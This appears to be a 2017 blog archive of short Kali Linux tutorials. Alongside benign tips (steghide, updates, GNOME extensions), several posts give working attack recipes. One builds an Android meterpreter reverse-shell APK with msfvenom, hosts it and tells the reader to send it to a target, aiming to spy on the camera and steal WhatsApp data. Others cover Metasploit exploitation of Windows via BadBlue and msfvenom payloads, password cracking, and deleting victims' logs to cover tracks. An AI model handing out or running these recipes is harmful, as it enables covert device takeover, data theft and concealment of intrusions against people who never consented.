Posts

Showing posts from August, 2017

Stegnography ( Steghide )

Image
= apt-get install steghide // installation command = steghide // help = steghide embed -cf image.jpg -ef file.txt = enter passphrase // for security = extract = steghide extract -sf image.jpg =enter password * STEGNOGRAPHY STEGHIDE *           Steganography is data hidden within data. Stegano+ graphy is an encryption technique that can be used along with cryptography as an extra-secure method in which to protect data. Steganography techniques can be applied to images, a video file or an audio file.           Steganography is the art of covered or hidden writing. The purpose of steganography is covert communication to hide a message from a third party. ... In ancient times, messages were hidden on the back of wax writing tables, written on the stomachs of rabbits, or tattooed on the scalp of slaves

How to Hibernate KALI LINUX

Image
= ADD Hibernate button from GNOME shell Extension

How to Add Shell Extension(eg .Battery Percentage) in KALI LINUX

Image
          When GNOME Shell (aka GNOME 3) dropped into the world of Linux, many criticized it for not being flexible enough. The new-look GNOME was seen as a step backward in productivity and efficiency. GNOME however had a few tricks up its sleeve to silence such naysayers. One such trick is GNOME Shell Extensions, which bring some much-needed configuration options to the GNOME 3 desktop environment. Offering everything from aesthetics to actual productivity, there’s a GNOME Shell Extension to fill whatever void you see in the latest version of GNOME.                   GNOME Shell Extensions to help make your desktop experience more efficient, productive, and enjoyable. Used with permission.

How to Install Filezilla FTP Client in KALI LINUX

Image
=apt-get install filezilla filezilla comman -y // for installation look in app drawer filezilla has been installed

How to Speed UP (bleachbit Tutorial) KALI LINUX

Image
=apt-get install bleachbit // installation command = bleachbit // run = select you want to clear file = clean

Honeypot ~Trap For Hackers

Image
            In computer terminology, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. = DOWNLOAD Pentbox from github. = Extract it & open in Terminal. = ./pentbox.rb = TCP port Scanner = 1. Fast auto Config // open 80 tcp port     2. Manual Config.

How to Genrate Wordlist For Password Hacking in KALI LINUX

Image
Wordlist :-           A word list is a set of words in an editable text format. You can view and modify a word list using a text editor or word processor. A compressed dictionary contains a set of words that has been compressed to reduce the amount of disk space and memory required to hold it. = crunch min max (charset) -o /path/wordlist.txt           One of the biggest and very comprehensive collection of 1,493,677,782 word for Password cracking list released for download. The wordlists are intended primarily for use with password crackers such as hashcat, John the Ripper and with password recovery utilities. ___________________________

Android Hacking~SPY-CAMERA,WhatsApp Database Hack(Using Metasploit) in K...

Image
*Exploitation Using msfvenom:- ( Client side Attack ) = msfvenom -p android/meterpreter/reverse_tcp lhost= your ip lport=_any port you want open_ _/var/www/html/virus.apk // ANGLE BRACKETS ARE NOT ALLOWED BY YOUTUBE = service apache2 start = msfconsole = use multi/handler = set payload android/meterpreter/reverse_tcp = set lhost_your ip = set lport_any port = show options = exploit /* msfvenom file send to your target and install it   same lhost and lport in whole code */

Windows Password Hack (Cracking Using ophcrack & xHydra) in Kali Linux

Image
Windows Password Hack Crack Using Hash ophcrack & xHydra  in Kali Linux Ophcrack :- ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms. xHydra :- xHydra is a GUI frontend for the password cracker called Hydra. Hydra can be used for both offline and online password cracking. Hydra can be used for many types of online attacks, including attacks against MySQL, SMB, MSSQL, and many types of HTTP/HTTPS logins, just to name a few.

Windows Hacking (Exploitation Using Badblue) in Kali Linux

Image
Windows Exploitation using Badblue:- = netdiscover                         //info-gathering. = nmap -A_ip                          //scanning to check port status. = msfconsole                         //launch metasploit framework. = search badblue                    //check badblue version. = use_use latest version of badblue //path wich is exploitable. = show option                         //check module options. = set RHOST _target ip          //set target ip address. = set RPORT _target port no//set target port . = show options                        //cross check about module options. = exploit                                     //exploit windows.

Kali Linux fun command (Train Game)

Image
= apt-get install sl = cd /usr/games = ./sl = ./sl-h

How to use github in Kali Linux for cloning

Image
1.OPEN BROWSER AND SEARCH ANY IN GITHUB 2. OPEN TERMINAL AND TYPE COMMAND git clone_CloneAddress          // _ = space

Covering Tracks After Windows Exploitation (Delete Logs From Victims Pc)...

Image
Delete Logs From Computer..... After Successful Exploitation......

Windows Exploitation using Metasploit Framework (Using msfvenom or .exe...

Image
* Exploitation:- *There are three steps in Exploitation :- 1. Info-gathering:- Target identyfy. 2. scanning:- To find loophole in target. 3. Exploitation:- To get in your target. *USE METASPLOIT FRAMEWORK FOR EXPLOITATION //Metasploit is Hackers Factory. /* FOR OUR UNDERSTANDING Factory    = Department Metasploit = Module */ *There are 6 Modules in metasploit framework:- 1. Auxilary module:- scanning/Dos. 2. Exploits:- its like Weapon. 3. Payloads:- it will make entry on your target. 4. Post:- activity performed in this module but after successful exploitation. 5. Encoder:- For bypassing antivirus. 6. Nopes:- Maintain file size of virus. *Metasploit Framework:- Developed by H.D. moore. (2003) in python there are only 3 auxilary and 2 exploit then sell to Rapid Company (2007) He Developed in ruby //Run metasploit framewrok = msfconsole //COMMANDS :- *Exploitation Using msfvenom:- ( Client side Attack ) = msfvenom -p windows/meterpreter/r

How to change Sources list (Repository) in Kali Linux

Image
Copy Sources.list from https://docs.kali.org/general-use/kali-linux-sources-list-repositories copy paste in Sources.list location :- Computer-etc-apt-open Texteditor (Sources.list) then type in Terminal apt-get update && apt-get upgrade

How to Change Root Password of Kali Linux

Image
Commands: passwd Enter Your password Password set.... ________________

How to clean Temp in Kali Linux

Image
// How to clean Temp in Kali Linux // Commands:- apt-get autoclean apt-get autoremove

cmatrix tutorials in Kali Linux

Image
COMMANDS:- __________________________________________________________________________________________________________________________________ apt-get install cmatrix  //For Install Cmatrix cmatrix --help // help cmatrix // Run __________________________________________________________________________________________________________________________________

How to find a Kernel version in kali linux

Image
// How to find a kernel version in Kali Linux // uname -h     // help of uname command_try all the commands

nmap (Network Mapper) Active Scanning in Kali Linux

Image
Scanning :- Total Ports are 65,536 //ports are entry point TCP= Transsmission Control Protocol UDP= Userdatagram Protocol Scannig are two type:- 1. Active Scanning.  //your ip is goes to your VICTIM.       2. Passive Scanning. //You use third party ip and attack to your VICTIM. Tool 1:- nmap ip //you get all open ports //active scanning Tool 2:- nmap -D fake ip,fake ip //error??

How to add Figlet in terminal of Kali Linux

Image
// How To Add Figlet in Terminal Of Kali Linux // figlet "Your name " // Add in Your .bashrc file

How Enable audio in Kali Linux (Pulseaudio - D)

Image
// ENABLE AUDIO IN KALI LINUX // Method 1 :- pulseaudio -D  :- // Type in terminal for one time enable                                   audio/voice in Kali linux Method 2:- pulseaudio -D :- // Add in .bashrc file for permanent enable                                 audio/voice in Kali Linux

How to Update kali linux & Dist upgrade

Image
// KALI LINUX UPDATE // For kali Update :- apt-get update && apt-get upgrade For Kali in-Buit Software upgrade:- apt-get dist-upgrade

Info-Gathering (Ping,The Harvester,Netdiscover) KALI LINUX TUTORIAL

Image
// THIS VIDEO IS EDUCATION PURPOSE ONLY......// LECTURE 1:- *INFORMATION-GATHRING * Tool 1:- ping_website name //find public ip of that Website Tool 2:- theharvester //to find employees name in terminal Tool 3:- netdiscover //to check how many device connected in one                lan Tool 4:- ipconfig //to find your ip in windows      ifconfig //to find your ip in linux Tool 5:- www.iplocation.net      www.whois.net      www.netcraft.net     /* To find information about public ip address              in that website no information about private ip address */ ICMP :- internet control massege protocol. //* IN THIS VIDEO NO WEBSITE IS HARM BY STRIVE       JUST FOR EXAMPLE *//